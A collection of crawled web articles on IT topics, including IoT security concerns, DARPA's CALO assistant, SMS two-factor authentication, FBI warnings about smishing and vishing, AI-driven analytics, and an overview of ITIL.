In summary, although end-to-end encryption and differential privacy offer strong user privacy protection, these two technologies interact in interesting ways, one fundamentally backpedaling the effect of the other. In this light, while differential privacy is a promising tool, implementing and deploying it while retaining the privacy of end-to-end encryption is challenging. | <urn:uuid:d22d3a66-8257-4e94-b667-1b3f16f6ebf9> | CC-MAIN-2017-04 | http://infosecisland.com/blogview/24830-Differential-Privacy-vs-End-to-end-Encryption--Its-Privacy-vs-Privacy.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281263.12/warc/CC-MAIN-20170116095121-00268-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.932499 | 1,351 | 3.125 | 3 |
The Internet of Things is on the cusp of making our lives easier as consumers and business professionals, but are these devices also making us more likely to be targeted by hackers?
Information security is a huge topic of conversation right now, and it’s about to get even bigger. Edward Snowden’s leaks on government surveillance and huge data breaches at Target, JPMorgan, TalkTalk and others made the subject front-page news, and that is likely to continue given the proliferation of the Internet of Things (IoT).
IoT devices, forecast to grow to 50 billion units by 2020, offer consumers and businesses huge amounts of convenience and benefit, but to hackers too they are also a goldmine. This is because such devices represent another piece of hardware or software that can be compromised – and ultimately lead to stolen data or money.
The early signs of IoT security are not encouraging; researchers have already managed to hack everything from Google’s Nest to an internet-connected doll and Canon printer, while significant and exploitable software vulnerabilities have also been found in Wi-Fi light bulbs, smartwatches and Internet-connected baby monitors. There have been questions too on how this affects businesses, if the likes of Nest and Hive are connecting to enterprise Wi-Fi networks.
Security experts have been quick to voice their fears over IoT, with many pointing the finger at device manufacturers.
A recent study of 7,000 IT professionals by cyber-security association ISACA found that 75 percent thought IoT device manufacturers were not implementing sufficient security measures devices, while a further 73 per cent said existing security standards were inadequate.
Speaking to Internet of Business shortly after these results were published, BH Consulting managing director Brian Honan joined the chorus of discontent.
“IoT makes our lives easier and better in many regards, but unfortunately you also have to take into account that, in the rush to get these devices to market, [manufacturers] forget about security.
“We’re seeing IoT devices, from kettles and light bulbs to a range of different products, that are insecure out-of-the-box; they have weak security, default passwords…and can allow people with malicious intent to control those devices for their own needs.
“We also have issue on privacy as lot of these devices can take a lot of information, which is being used by companies to improve services. But if that information falls into wrong hands, that will impact on privacy.”
Ken Munro is CEO and founder of penetration testing outfit PenTest Partners, which has found numerous IoT device vulnerabilities over the last year, and he agrees with Honan that security must be baked-in to products from the start, especially given the fast acceleration of IoT devices.
“The reason I love IoT as a security researcher is that there’s enormous attack surface,” Munro told IoB, adding that attackers can leverage everything from device and mobile application flaws to API and server infrastructure vulnerabilities in order to attack IoT users.
He said that rolling such devices out across staff and customers is simply accentuating that risk.
“Everyone has got access to everything with IoT, and this means that you need firmware, OS, mobile app and coding experts…You need to know how to put apps together with wireless or GSM technology. There’s a massive expansion skillset required in order to adopt IoT.”
“We’re seeing crazy acceleration of IoT devices available, primarily because there’s money to be made, but I think we’re going to see standards starting to become available”. Munro is working on standards at the IoT Security Foundation, and says GSMA are working on something similar for mobile communications.
Munro adds vendors are too often focused on getting goods to market rather than if the device is secure. Some, he says, simply hope to patch the OTA or ‘hope the problems go away’.
Munro, who praised Fitbit for bolstering its own security team at the start of the year, says that IoT flaws, which usually reside in app source code or resolve around weak passwords and unsecured Wi-Fi, can enable attackers to take control of devices locally or remotely. The latter could ultimately lead to larger-scale attacks, such as turning off heating or surveilling a property to see when it not occupied.
Other experts, meanwhile, have cited patch management as a major issue given billions of IoT devices forecast to ship, and say that more elaborate IoT attacks could lead to driverless cars becoming mobile bombs, or connected devices sending malware via botnets or through spam emails.
But benefits outweigh the negatives
Shipping company Maersk reportedly has one of the largest deployments of industrial IoT, using IoT to ensure refrigerated containers all maintain the correct temperature.
Speaking at a recent conference, UK CIO Andy Jones outlined the benefits of the deployment, saying that the firm is now able to monitor goods in real-time via IP-enabled sensors, whereas it previously took engineers two days to check and report on these conditions.
The readings from these sensors are continually fed into Maersk’s monitoring systems via satellite, and any problems at sea can be identified immediately.
Jones says the problem arises where IoT systems are connected to something physical, like braking or airbag systems of vehicles or the heating and cooling systems of buildings. The security challenges are many, not only because of the difficulty in keeping devices and software patched, but also because the internet protocol (IP) used by IoT devices is inherently insecure.
“Combine this with the fact the internet does not have any form of service level agreement, that there are millions of devices in the hands of unsophisticated users, and that the internet is accessible worldwide, and you have the perfect storm,” he said.
Alan Woodward, computing professor at the University of Surrey, added in an interview with IoB: “My big concern from a security perspective…is that IoT is set up using embedded computing, which is notorious for cheap, open-source, off the shelf bits of software and hardware.”
He has concerns over cheap devices and weak patch management, saying on the latter that updating the firmware on embedded IoT systems is ‘extremely difficult’ and ‘problematic’.
“I think IoT has far more potential than ever mainstream computing for being compromised. The Internet of Things is classic area where people are having to relearn all lesson taken 25 years to learn in computing.”
What businesses can do
Munro urges CIOs and other IoT decision makers to be proactive in auditing and managing devices, even it means ‘walking the floors’ to find out what devices are connecting to enterprise networks.
The CIO, he says, must think “really seriously” what data could be compromised if system breach, what hackers access to, and if segregated [on the network]. carry out risk assessment.
Jones is optimistic of the future, but advises isolating IoT devices on risk. “Any risk assessment should include the criminal mindset and learn from past analogies,” he said. Woodward urges for companies to roll-out IoT policies of use, so users clearly know their data can be wiped and devices managed. | <urn:uuid:b9a835f0-5e94-4f05-956f-fd70403f71d6> | CC-MAIN-2017-04 | https://internetofbusiness.com/how-secure-is-the-internet-of-things/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282110.46/warc/CC-MAIN-20170116095122-00176-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.954207 | 1,504 | 2.515625 | 3 |
Two years since its demise, the spectre of Microsoft's animated paperclip, Clippy , still haunts anyone hoping to develop a virtual assistant to help people get things done. Few have tried to push virtual assistants to the public since.
By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers.
But Clippy's unpopularity hasn't deterred the US Defense Advanced Research Projects Agency (DARPA) from spending an estimated $150 million on its own virtual helper.
And although intended to ease the US military's bureaucratic load, an artificially intelligent helper based on the project is heading the way of consumers later this year.
Begun in 2003 the CALO, for Cognitive Assistant that Learns and Organizes, project involved over 60 universities and research organisations and is the largest ever non-classified AI project. It ends this Friday and has produced a virtual assistant that can sort, prioritise, and summarise email; automatically schedule meetings; and prepare briefing notes before them.
That focus could make the crucial difference between CALO being an annoyance like Clippy, and a genuinely useful helper.
Most software capable of learning needs large numbers of examples for something to stick – a spam filter trained on millions of emails, for example. But CALO needs to be quicker on the uptake. If it takes thousands of examples to learn how someone likes their email sorted, frustrated users will soon switch it off.
So the developers have built in tricks such as "transfer learning", which applies lessons from one domain to another. For example, if a person consistently marks emails from one person, perhaps their boss, as high-priority, CALO can use that knowledge to order their meeting schedule too.
A spin-off of DARPA's project, an app called Siri, will be coming to Apple's iPhone later this year. Siri has been designed to assist with mundane tasks, such as checking online reviews to find a good local restaurant and booking a table.
Rather than having to personally trawl through multiple websites to find a likely eatery, get the contact details and address, and make a reservation, the user can verbally instruct Siri to, say, "find me a romantic Thai restaurant in this area".
Siri uses navigates the various web services for the user, even booking restaurants and taxis through web forms where possible. The person it is helping can also book cinema tickets, and search for flights or weather forecasts without typing a word.
Another CALO spinoff is Social Kinetics, a social-network analysis package that helps people organise their contacts by criteria that can include relationship and expertise.
The system is already being used by the military to track how information flows through the ranks, identify experts, and generate a repertoire of answers to standard questions.
The consumer version focuses on healthcare, connecting people to the experts and information they need to make decisions about their health and treatment.
Bart Selman, an AI researcher at Cornell University who is not involved with the CALO projects, says that virtual assistants are not yet comparable to human help. "It's safe to say that the system does not yet perform at the level of a dedicated personal assistant," he told New Scientist.
But, he continues, in most organisations, human helpers are a luxury most people do not have. In these situations, automated, dedicated, and personalised assistants could be helpful – as long as they don't bug the hell out of their users.
This article originally appeared on New Scientist. | <urn:uuid:f46b0c8a-31dc-4305-9580-da3f1f70fbef> | CC-MAIN-2017-04 | http://www.computerweekly.com/news/1280096980/DARPA-designs-a-new-Clippy-virtual-assistant-military-style | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284376.37/warc/CC-MAIN-20170116095124-00084-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.949858 | 719 | 2.609375 | 3 |
Here's a polarizing question: is a phone a second factor, in the context of two-factor authentication? Fellow infosec pro @johnnysunshine tweeted the above last week, and sparked a lively debate.
Before answering the question, let's back up a bit and explain two-factor authentication (or 2fa). To borrow an analogy I first used two years ago: 10,000 years ago, Grog and Mag formed a secret club. To ensure new members of the club would be accepted, they came up with a secret phrase. Thus was born the first password. One day Narg overheard two members greeting one another and learned the secret phrase. Thus occurred the first password breach.
Passwords can be stolen though, whether through a server database breach, or via a phishing scam, or by keylogging malware that captures the password as you enter it into a webpage. If a password is the only thing protecting your account, then a stolen password lets an attacker pretend to be you. If the attacker knows the right password, the server or website has no way of knowing it's an impostor.
By adding a second factor - something you physically possess (an identification card, or a token generator, or - the crux of today's question - a phone), the bar for an attacker is raised. Individually, each factor might be relatively easy to defeat. Gaining access to both a password and a device at the same time though takes more effort, and is far less likely. Not impossible, but less likely.
About that phone...
Two-factor means you as the user have to have a second thing with you to serve as the second factor. Some services offer a physically unique device to serve as the second factor - often something along the lines of an "RSA Token" - a small device about the size of a USB flash drive that displays a number, which changes every minute or so. Less common is a token the size and shape of a credit card that does the same.
But think about the number of important accounts you have: banks, credit card accounts, email accounts, social media accounts. Carrying one "second factor" around might not be a nuisance, but carrying a dozen around becomes impractical in a hurry. What is something almost everyone has though, and has with them at almost all times?
A cell phone.
Service providers caught onto this a few years ago and began implementing a form of two-factor authentication in which the provider sends a SMS or text message with a typically six-digit code to enter along with your password. Similar to a physical code generator, the SMS code is only useful for about a minute before it changes to something else.
More recently, companies including Google, game maker Blizzard, and security provider Duo have produced Android and iOS authenticator apps that emulate the function of a code generator. Functionally though, they behave the same: they give a one-time-use token that is good for about a minute, and must be used along with the password in order to log into an account.
So what's the big deal?
Well, as Twitter alias @munin implies, phone malware and malicious actors. The story that kicked off this discussion described a sophisticated new mobile malware scheme currently targeting customers of 20 banks in Australia, New Zealand and Turkey. The initial bait was a popup message indicating that a particular website required installing "Flash Player" - but the install link was fake. Upon installing the malicious fake Flash Player, the program would silently scan the phone for the mobile apps of targeted banks and download additional payloads for each app found.
To defeat two-factor authentication, the malware can forward SMS communication to the attacker. It can also delete SMS communication from the phone itself, enabling the attacker to generate and intercept future 2FA tokens without the user being aware. Security firm ESET has all the gory details in their analysis of the malware.
So, phones aren't suitable for two-factor authentication?
If you ask 10 security experts that question, you'll get 12 answers. There are many experts whose opinions I respect, that will disagree with me - and that's OK. Read the discussion that follows the original tweet and you will see a variety of well-informed opinions on both sides. Cyber security is a complicated field, fraught with threats and exploits.
But Security For Real People exists to give reasonable advice for reasonable security. Saying mobile two-factor authentication is too risky to use is no help to you - because what is your alternative? Two-factor authentication using a phone is convenient to you, it is widely available, and it raises the bar for an attacker significantly. Can it be defeated? Sure. But using a password alone is far more likely to result in a compromised account.
Bottom line? For accounts that you would be seriously unhappy to have broken into, if the provider offers two-factor authentication using your cell phone, by all means take advantage of it.
This article is published as part of the IDG Contributor Network. Want to Join? | <urn:uuid:c9e8665d-4670-4b5f-a88b-e81221ebc583> | CC-MAIN-2017-04 | http://www.csoonline.com/article/3044605/security/does-a-smartphone-make-two-factor-authentication.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00388-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.947568 | 1,033 | 3.03125 | 3 |
Definition: A binary tree where every node's left subtree has keys less than the node's key, and every right subtree has keys greater than the node's key.
Generalization (I am a kind of ...)
binary tree, search tree.
Specialization (... is a kind of me.)
AVL tree, splay tree, threaded tree, randomized binary search tree, discrete interval encoding tree.
Aggregate parent (I am a part of or used in ...)
See also relaxed balance, ternary search tree, move-to-root heuristic, jump list.
Note: A binary search tree is almost always implemented with pointers, but may have a variety of constraints on how it is composed.
A animation (Java).
If you have suggestions, corrections, or comments, please get in touch with Paul Black.
Entry modified 26 January 2015.
HTML page formatted Mon Feb 2 13:10:39 2015.
Cite this as:
Paul E. Black, "binary search tree", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds. 26 January 2015. (accessed TODAY) Available from: http://www.nist.gov/dads/HTML/binarySearchTree.html | <urn:uuid:d6bc40ce-4444-4b63-b2ed-b656893b0397> | CC-MAIN-2017-04 | http://www.darkridge.com/~jpr5/mirror/dads/HTML/binarySearchTree.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280723.5/warc/CC-MAIN-20170116095120-00296-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.879651 | 273 | 2.9375 | 3 |
The main shortcoming of these distributions is that they integrate into the Windows desktop, rather than presenting a GNU/Linux one. They do not, for instance, give users the opportunity to use multiple workspaces, or to try desktop customization options. But, since each installs, runs, and uninstalls as though it were another Windows program, most people should have little trouble using it.
A live CD or DVD is one that you can use to start your computer. Live CDs became popular in GNU/Linux in 2003 with the release of Knoppix, although they existed before then.
Today, almost every distribution includes Live CD versions on their download pages, especially user-friendly ones like Ubuntu or Fedora. To use one, you must download the CD or DVD image file (both of which have an .iso extension), then create a disk from the file. Your burning software will have an option for working with an image file that is separate from the one for creating a data disk.
When you have burned the disk, place it in the drive and re-start your computer. As your computer boots, you may need to change its boot order from the hard drive to the CD/DVD drive. Depending on your machine, you may have to press a key or sequence of keys to change the boot order, so that it boots from the CD/DVD drive instead of the hard disk. This change is made either in a separate menu or in the BIOS. If you watch as your computer starts, you will see a message telling you what keys you need to press.
Most Live CDs will boot to a GNU/Linux desktop. Some, however, stop at the login screen and require that you enter a user name and password before you reach the desktop. You can find the user name and password you need on the download page from which you got the image file.
The main advantage of a live CD is that you can boot into GNU/Linux without making any changes to your system. While you can access your hard drive from a live disk, you have to make a deliberate effort to do so, and most basic users will have no idea how to make that effort.
A live CD is also useful as a recovery disk. If you want secure computing, or the ability to carry a familiar operating system for use in whatever computer you happen across, you can use a live CD with a flashdrive on which to save your files.
The disadvantage of live disks is that they are slow compared to a hard drive. Used on a laptop, which is generally slower than a workstation, they can be painfully slow. The first time you start a computer with one, you may wonder if it's stalled, and on the desktop programs will start slowly. The impression that new users might get is that GNU/Linux is much slower than Windows, when usually the opposite is true.
You cannot do much about this lack of speed. However, you can minimize it if you choose a distribution designed for older computers, such as Damn Small Linux, or one optimized for speed, such as many of the Slackware-based distributions, such as NimbleX.
Live USB drives are similar to a Live CD/DVD. Typically, though, Live USB drives are not on the download pages of your distribution of choice. Instead, they are usually developed by a sub-project that you can find by a quick Web search.
Live USB drives have all the advantages of a Live CD, and none of the disadvantages. Although slower than a hard drive, Live USB drives are much faster than a Live CD, and can hold much more information. Many, too are persistent -- that is, you can store files and make permanent changes to the desktop, neither of which you can do from a Live CD. All of which means that a test drive using a Live USB is far closer to the experience of using GNU/Linux on a workstation.
However, in many cases, you need a machine with GNU/Linux installed to create the Live USB drive. A notable exception is Fedora's LiveUSB-Creator, a script that runs a wizard in Windows XP or Vista to step you through the creation of the live flashdrive. | <urn:uuid:23b19f66-5875-4c07-bee7-9fac5d6c07c0> | CC-MAIN-2017-04 | http://www.datamation.com/osrc/article.php/12068_3755906_2/Five-Ways-for-Windows-Users-to-Test-Drive-GNULinux.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281332.92/warc/CC-MAIN-20170116095121-00112-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.950208 | 854 | 2.625 | 3 |
A focal point requirement of the 2002 No Child Left Behind Act (NCLB), federal legislation aimed at improving U.S. primary and secondary schools performance, was to implement accountability systems that analyze student and educator data, and report those results to the U.S. Department of Education. These reporting systems were heralded as an effective way to help state departments of education collect statistics to assess teacher proficiency and student progress.
"It's really important to be able to follow individual students from grade to grade, school to school, district to district and see how they are doing over time," said Jim Hull, a policy analyst at the National School Boards Association (NSBA). "We haven't been able to do that before."
In addition, educational data systems offer the advantage of getting assessment data back to educators faster than before. "You had the old-fashioned assessment test that's taken in April and no one gets results until October or November. It's not a useful timeframe; those kids have moved on," said Ann Flynn, director of education technology programs at the NSBA.
While there is little doubt that collecting more specific data - and publishing the results more quickly - is beneficial to educators, many states have struggled with how to best implement data systems. Limited funding, institutional resistance to change, and schools' use of various student information systems have been impediments.
New Mexico officials, however, believe they have solved some of those issues with the state's Student Teacher Accountability Reporting System (STARS).
Longitudinal Student Data
STARS is a statewide, "longitudinal" educational information system that collects data from students through all grade levels, starting in kindergarten and continuing through the 12th grade. Although NCLB doesn't require longitudinal systems, states such as Florida have shown that having that kind of long-term data can be a useful measurement when assessing how well a school, district or state is meeting educational benchmarks for schools and individual students. Florida has been electronically collecting its longitudinal student data since the 1980s, allowing the state to make decisions based on comprehensive, accurate and timely data about its schools.
The STARS system collects and aggregates a variety of student data: demographics and achievement information, exam scores on state- and federally mandated tests, districts' financial information, and teacher licensing data. "At a minimum, the system collects information on students, teachers, staff, programs and schools," said Philip Benowitz of Deloitte Consulting, the engagement director for the STARS project. "But there's no limit to what the system could collect. We're still in the early stages of understanding what makes sense and what's really valuable."
Moreover, the system standardizes data so it can be reported to the federal government as required by NCLB.
But Benowitz asserts that STARS has more value than just for NCLB compliance. New Mexico can provide data to the school districts for their own analyses and use. "The intent and the spirit is to put the data in the hands of educators and analysts who can make a difference in student achievement - the classroom teacher, the principal, the state educational analyst," he said. "People who can help to improve the curriculum and student achievement."
Overcoming Interoperability Issues
New Mexico CIO Roy Soto said it was a challenge to determine the best way to collect and consolidate data. "New Mexico is no different from any other state. We have 89 school districts, all collecting data in a different form and fashion."
Unlike many other states, New Mexico had been collecting student-level data since 1997 with the STARS predecessor, the Accountability Data System (ADS). But ADS had maintenance and system integrity issues. Before making critical implementation decisions on a new system, the state conducted several legislative audits. After careful consideration of the results, the state chose
a data warehouse solution and put out an RFP to find a vendor.
"We basically took the audits, with specific emphasis on what needed to be fixed, and put it into our request for proposal," said Robert Piro, CIO of the New Mexico Public Education Department (PED). "Deloitte Consulting presented us with a solution based on eScholar and Cognos."
With eScholar, an educational data collection and analysis tool, and Cognos business intelligence software, Deloitte created a commercial-off-the-shelf system that allows school districts to collect data as they've always done.
"In New Mexico, there are a dozen or more student information system vendors that have systems in place in one or more of the 89 school districts. The last thing we wanted to do is mandate that they all use the same system," Benowitz said. With the STARS solution, school districts can continue using their existing systems and produce a flat extract data file that can be uploaded to the data warehouse automatically.
New Mexico implemented the system in nine months. "We started the prototype in December of 2005, and then did a pilot with 11 districts in spring 2006," Piro said. "We're now in our second year of data collection."
One of New Mexico's biggest hurdles was change management. Since the system was implemented in less than one year, there was pushback at the district level from some educators.
"When you have so many different entities that are basically independent, doing things a certain way, it's hard," Soto said. "Some people saw it as, 'Here comes Big Brother.'"
Although school districts could keep their internal systems, the move to STARS required a redefinition of processes for what kind of data to collect and when to collect it. This caused some consternation from districts that already had workflows in place.
Daryl Landavazo, New Mexico's STARS IT project manager, said the districts have been collecting student-level data for some time. "So the assumption was, 'We're using data; we know how to report, and we know what we're collecting,'" he said. "But that's not always the case."
To combat resistance, the STARS team marketed a proof-of-concept system to both the school districts and the Legislature. "We showed them the proof of concept, and said, | <urn:uuid:c1ac63d4-7445-455d-a8f7-168434bd0dc3> | CC-MAIN-2017-04 | http://www.govtech.com/education/Student-Tracking-System-Helps-New-Mexico.html?page=2 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280308.24/warc/CC-MAIN-20170116095120-00232-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.964404 | 1,265 | 3.203125 | 3 |
The U.S. military is developing wireless networking technology 500 times faster than what's currently used to communicate between aircraft and the ground in war zones. The Defense Advanced Research Projects Agency (DARPA) announced on Dec. 14 development of a wireless common data link (CDL) capable of transmitting data at 100 Gbps, according to a press release. According to ExtremeTech, current U.S. military CDL technology typically reaches a maximum of 250 Mbps.
The wireless backbone is intended to replace traditional fiber broadband networks in areas where war makes such technologies impractical to deploy. The exact goal of the project will be to create a 100 Gbps data link between an aircraft 60,000 feet in the air and the ground. One major challenge in creating such a high-bandwidth, low-latency wireless technology is cloud cover.
“The system will be designed to provide all-weather capability enabling tactically relevant data throughput and link ranges through clouds, fog or rain. Technical advances in modulation of millimeter-wave frequencies open the door to achieving 100G’s goals,” a DARPA press release reads.
Photo from Shutterstock | <urn:uuid:6e84b960-a4c2-483d-92b8-489e4388d837> | CC-MAIN-2017-04 | http://www.govtech.com/DARPA-to-Develop-High-Speed-Surface-to-Air-Wireless.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00534-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.898199 | 234 | 2.84375 | 3 |
One of the really hard things about having Big Data is figuring what to do with it. There are obvious questions that can be asked such as "what’s the correlation between demographics and purchasing choices" but when it comes to complex inductive reasoning you need expertise and thus we’ve seen the rise of a new analytics role: Data scientist.
Data scientists were recently the topic of a Harvard Business Review article, Data Scientist: The Sexiest Job of the 21st Century (paywalled) but there’s a problem with this profession: There aren’t enough of them. And no matter how many universities can produce in the next few years there still won't be enough.
The answer is, of course, to set a computer onto the task of analyzing and deriving insights and conclusions. Unfortunately most of the available solutions are complex to use and require that you ask just the right question in a some sort of computer language. Enterra Solutions, a key competitor in the big data analytics market, has a solution that is completely different in that it can automatically mine data exhaustively and intelligently to draw conclusions based on natural language queries.
Enterra Solutions can ingest huge amounts of data and using natural language processing transform it into knowledge using a generalized ontology to discover the meanings of words in context along with the implicit rules and relationships as used by humans.
Then, when a question is asked in what is more or less natural language, the database of knowledge is accessed by Enterra's Hypothesis Engine. The Hypothesis Engine is an artificial intelligence system that applies common sense and and domain-specific ontologies to further structure the knowledge. Next, using Enterra's Rules-Based Inference System it can determine an objective and find the facts to support that objective (backward chaining) as well as using facts to determine objectives (forward chaining) as determined by the knowledge found and its significance.
Other engines in the system weigh results, formulate database queries, and analyze assets and all of these components pass data back and forth between themselves based on rules and inferences to derive conclusions.
As an example, a grocery chain might ask “Find what drives an uplift in sales for Cumin food flavorings in PA and map the results.” The already ingested data that now has structure is a passed to the Hypothesis Engine which will produce something like this:
This is a map of Pennsylvania showing the result of that query: Enterra concluded the uplift is due to increased sales of barbecue sauces in conjunction with purchases of beef, chicken, and pork. The resulting map plots the locations and the individual increased lifts in sales and spending for each protein in each store. Armed with this data a marketing group could create individual promotions based on the most popular proteins and sauce for each store.
Enterra’s solution is being used by several major corporations including McCormick & Company, Inc., the 150-year old spice and ingredients company. McCormick has developed Flavorprint, a service they describe as "the food equivalent of Pandora’s Music Genome Project." Flavorprint offers recipes as well as spice and flavoring suggestions based on your culinary preferences and Enterra is a key component of the Big Data analytics that drives the service.
Artificial intelligence driven analytics will have a big impact not only in sales and marketing but also in healthcare (particularly epidemiology), education, farming, and supply chain management. Moreover as platform performance increases due to improved storage and processor performance you’ll see this type of analytics being done in real-time.
The application of artificial intelligence to Big Data analytics is one the hottest areas in data science and it’s ability to make up for the shortfall of human data scientists (which is likely to be a long term problem) means Enterra Solutions has a very rosy future. | <urn:uuid:585b63cb-85a3-42a1-8e98-8109083f0e06> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2226491/software/not-enough-data-scientists-use-ai-instead.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00350-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.950827 | 785 | 2.640625 | 3 |
The birthday attack is a statistical phenomenon relevant to information security that makes the brute forcing of one-way hashes easier. It’s based off of the birthday paradox, which states that in order for there to be a 50% chance that someone in a given room shares your birthday, you need 253 people in the room.
If, however, you are looking for a greater than 50% chance that any two people in the room have the same birthday, you only need 23 people.
This works because the matches are based on pairs. If I choose myself as one side of the pair, then I need a full 253 people to get to the magic number of 253 pairs. In other words, it’s me combined with 253 other people to make up all 253 sets.
But if I am only concerned with matches and not necessarily someone matching me, then we only need 23 people in the room. Why? Because it only takes 23 people to form 253 pairs when cross-matched with each other.
So the number 253 doesn’t change. That’s still the number of pairs required to reach a 50% chance of a birthday match within the room. The only question is whether each person is able to link with every other person. If so you only need 23 people; if not, and you’re comparing only to a single birthday, you need 253 people.
This applies to finding collisions in hashing algorithms because it’s much harder to find something that collides with a given hash than it is to find any two inputs that hash to the same value.:
[ Updated: August 2008 ] | <urn:uuid:3fd76b35-8ad6-4358-92ef-9a86e9d855ca> | CC-MAIN-2017-04 | https://danielmiessler.com/study/birthday_attack/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00378-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.938161 | 331 | 3.09375 | 3 |
The FBI's Internet Crime Complaint Center (IC3) recently published a warning about Smishing and Vishing. These mobile phone threats are variations of phishing, but smishing uses SMS texts to initiate the scam, while vishing uses automated phone calls.
These threats are new variations on an old and costly mythology of identity theft. The problem here is that mobile users who are novice with regard to computer security threats are simply unaware they are in jeopardy when they respond to text and audio phishing on their mobiles.
Similarly, sophisticated corporate IT users who should know better, are similarly compromised via their mobile phones.
Just to backup a step, SMS stands for short message service. SMS is also often referred to as texting, sending text messages or text messaging. The service allows for short text messages to be sent from one cell phone to another cell phone or from the Web to another cell phone.
Just because the SMS service runs on a phone does not make it impervious to computer phishing.
The particularly nasty form of SMS spam called smishing, is the act of phishing by SMS for private information, often to be used for identity theft. These smishing attempts take the form of text messages and voice massages, which come to your phone saying things like "We’re confirming you've parcel delivery” Your account status as been changed or ABC credit card is confirming your purchase."
The user is given a phone number to call or a website to log onto to provide account credentials to remedy the issue. Or the victim is directed to a spoofed web site. A spoofed web site is a fake site that misleads the victim into providing personal information, which is in turn routed to the scammer's computer.
If a victim attempts to telephone back to the inbound number of a phishing call they will most probably encounter no voice mail or a constantly busy signal. This is due to attackers calling from throw-away, untraceable phones, rendering these calls virtually untraceable.
The FBI report said a recent smishing scam was used to steal money from customers of a credit union. After receiving a text about an account problem, victims called the number provided and gave out their personal information. Within 10 minutes money was withdrawn from their bank accounts. The same technique also recently used to attack banking customers who were told via text that they needed to reactivate their ATM cards at a bogus web site.
What to do. What not to do.
Once again, here are old and trusted simple steps to avoid being a victim of identity theft and fraud:
• Do not respond to respond to text messages or automated voice messages from unknown or blocked numbers.
• Do not respond to unsolicited (spam) email.
• Do not click on links contained within an unsolicited email.
• Be cautious of email claiming to contain pictures in attached files, as the files may contain viruses. Only open attachments from known senders. Avoid filling out forms contained in email messages that ask for personal information.
• Do compare the link in the email with the link to which you are directed. Look and see for yourself if it is the legitimate URL address. Better still, just log directly onto the official web site for the business identified in the email. If the email appears to be from your bank, credit card issuer, or other company you deal with frequently, your statements or official correspondence from the business will provide the proper contact information.
• Do contact the actual business that supposedly sent the email to verify if the email is genuine.
• Do verify any requests for personal information from any business or financial institution by contacting them using the main contact information.
Have a secure week. Ron Lepofsky CISSP, CISM www.ere-security.ca | <urn:uuid:7d56b1b1-12d8-412a-81b4-bfa2e5bfe2c7> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2227870/access-control/what-s-your-pain-threshold-for-mobile-phone-identity-theft-.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281001.53/warc/CC-MAIN-20170116095121-00315-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.938564 | 771 | 2.71875 | 3 |
The basics of ITIL and why ITIL certification is taking over the world
ITIL, The Information Technology Infrastructure Library, is part of a suite of best-practice publications that explain the IT Service Management Framework (ITSM) — how to deliver and manage IT services in an organization in a way that best meets the expectations of the business and the customer.
ITIL stresses “Best Practice” in delivering IT services. “Best Practice” is a technique or methodology that, through experience and research, has proven to consistently and reliably lead to a desired result — hence its use as a benchmark. ITIL checks all the boxes when it comes to ITSM, with more than 25 years of extensive investment in understanding and improving on the best methods, processes and ideas for the delivery of IT services.
Originally developed in the late 1980s, ITIL was an initiative of the government of the United Kingdom. The Central Computing and Telecommunications Agency (CCTA) — since renamed Office of Government Commerce (OGC) — was tasked with investigating how the government could address the lack of quality in procured IT services, as well as manage associated costs.
Four iterations later, the current version of ITIL (2011) was born. In 2013, OGC went into partnership with Capita plc to form AXELOS, a joint venture to market and manage the best practice portfolio on behalf of OGC.
The ITIL framework provides guidance on IT service delivery based on five stages of the service lifecycle, set forth in five core publications:
● ITIL Service Strategy
● ITIL Service Design
● ITIL Service Transition
● ITIL Service Operation
● ITIL Continual Service Improvement
Under these lifecycle stages, ITIL describes 26 processes and four functions which go into detail about how IT service providers can deliver and manage IT services with regard to purpose, objectives, value to business, policies and principles, activities, triggers, inputs and outputs, challenges, risks, roles and responsibilities.
ITIL is the world’s most widely used ITSM framework. It provides guidance to service providers on the provision of quality IT services, and on the processes, functions and other capabilities needed to support them.
Practitioners utilize the techniques, processes and functions described in ITIL publications to discover and implement the best ways to organize IT structures and deliver IT services. Utilizing ITIL’s best-practices enables an entity to reap the benefits of high-service availability and performance, improved customer satisfaction, better cost management and faster time to deliver new services.
Benefits of ITIL
ITIL’s main takeaway is that IT service providers should view their offerings from a customer or user’s perspective. They should always ask how these services can best be delivered to meet customer and user requirements in order to achieve their desired outcomes. There are many benefits to utilizing ITIL. The more prominent ones include:
● Alignment of IT with the current and future business needs
● Ability to negotiate realistic service levels at acceptable costs
● Ability to develop predictable and consistent processes
● Ability to achieve greater efficiency via well-defined processes and documented accountability
● Ability to measure and track the improvement of services and processes
● Ability to develop maintain and share a common language of terms
ITIL’s “adopt and adapt” policy means that the best practices described can be contextualized to any organization based on its size, needs and capabilities. A company shouldn’t be seeking to implement ITIL for what it is, but rather implement ITSM using ITIL guidance in a manner that meets their needs and desired outcomes.
